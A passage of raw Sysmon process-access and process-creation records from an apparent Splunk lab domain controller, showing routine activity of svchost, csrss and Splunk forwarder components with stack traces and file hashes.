13:53:48.689{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009217Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:48.689{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009216Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:48.689{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009215Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:48.689{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009214Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:48.689{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009213Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:48.689{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009212Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:48.689{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009211Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:48.689{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009210Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:48.689{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009209Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:48.689{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-92EC-6005-C704-00000000A301}2820C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009208Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:48.689{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-92EC-6005-C704-00000000A301}2820C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009207Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:48.690{59A5CD1D-92EC-6005-C704-00000000A301}2820C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009206Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:48.158{59A5CD1D-92EC-6005-C604-00000000A301}24844232C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009205Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:48.017{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-92EC-6005-C604-00000000A301}2484C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009204Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:48.017{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009203Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:48.017{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009202Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:48.017{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009201Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:48.017{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009200Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:48.017{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009199Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:48.017{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009198Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:48.017{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009197Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:48.017{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009196Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:48.017{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009195Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:48.017{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-92EC-6005-C604-00000000A301}2484C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009194Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:48.017{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-92EC-6005-C604-00000000A301}2484C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009193Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:48.018{59A5CD1D-92EC-6005-C604-00000000A301}2484C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009233Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:49.830{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-92ED-6005-C804-00000000A301}864C:\Program 